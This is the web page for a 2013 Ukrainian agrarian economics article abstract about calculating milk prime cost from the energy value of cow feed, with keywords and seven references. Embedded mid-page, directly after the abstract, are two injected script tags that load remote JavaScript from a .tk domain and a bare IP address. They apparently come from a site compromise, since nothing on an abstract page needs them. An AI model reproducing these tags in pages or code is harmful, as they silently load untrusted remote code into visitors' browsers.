ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 338.512
Економіка агропромислового виробництва

Determination of milk prime cost baised on the energy evaluation of feed / Rybachenko O.M., Tuchyk A.V. // Ekonomika APK. - 2013. - № 1 - P. 38

An article studies possible ways of determination of milk prime cost taking into consideration the energy evaluation of a daily feed for cows. It can insure high production level together with the lowest expenses. Tabl.: 3. Figs: 3. Refs: 7.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: prime cost, optimum structure of ration, energy evaluation of feeds, cattle productivity level, material and finance resourses

References

  1. Дем ’яненко С.І. Менеджмент виробничих витрат у сільському господарстві / С.І. Дем’яненко. - К.: КНЕУ, 1998. - 264 с.
  2. Цал-Цалко Ю.С. Витрати підприємства: навч. посіб. / Ю.С. Цал-Цалко. - К. : ЦУЛ, 2002. - 656 с.
  3. Цуп В.І. Ефективність використання раціонів різної структури у годівлі лактуючих корів / В.І. Цуп, Г.М. Талабан, В.Р. Сельський // Інноваційна економіка. - 2009. - № 4. - С. 211-214.
  4. Дурст Л. Кормление сельскохозяйственных животных; / Л. Дурст, М. Витман; пер. с немецкого под ред.и предисл. Ибатуллина И.И., Проваторова Г.В. - Винница: Нова книга, 2003. - 384 с.
  5. Гноевий IB. Годівля і відтворення поголів’я сільськогосподарських тварин в Україні: монографія / І.В. Гноєвий; IT УААН, ХДЗВА. - Харків: Магда LTD, 2006.- 400 с.
  6. Романов Д. Особенности кормления высокопродуктивных коров / Д. Романов // Тваринництво України. - 2011. - № 8. - С. 24-26.
  7. Васильев Н.И. Методические рекомендации по расчету потребности кормов в молочном животноводстве / Н.И. Васильев, Ю.Г. Егоров / за ред. Л.Н.Семенова. - Чебоксары, 2011. - 24 с.
Read article: 13_01_05.pdf